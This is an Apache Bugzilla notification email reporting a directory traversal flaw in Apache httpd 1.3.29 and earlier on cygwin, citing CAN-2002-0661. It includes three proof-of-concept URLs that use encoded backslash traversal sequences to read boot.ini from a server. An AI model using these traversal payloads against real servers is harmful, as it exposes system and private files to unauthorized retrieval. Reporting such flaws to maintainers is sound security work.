DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://nagoya.apache.org/bugzilla/show_bug.cgi?id=26152>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND INSERTED IN THE BUG DATABASE.
http://nagoya.apache.org/bugzilla/show_bug.cgi?id=26152 Apache 1.3.29 and below directory traversal vulnerability Summary: Apache 1.3.29 and below directory traversal vulnerability Product: Apache httpd-1.3 Version: 1.3.29 Platform: PC URL: http://http:// OS/Version: Other Status: NEW Severity: Normal Priority: Other Component: core AssignedTo: [email protected] ReportedBy: [EMAIL PROTECTED] on cygwin environment, any files can be retrieved by malicious users Apache 1.3.24 (cygwin default version) vulnerability http://[server]/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini http://[server]/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini Apache 1.3.29 and 2.0.48 (source compile version) vulnerability http://[server]/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini cf. http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00241.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0661 --------------------------------------------------------------------- To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
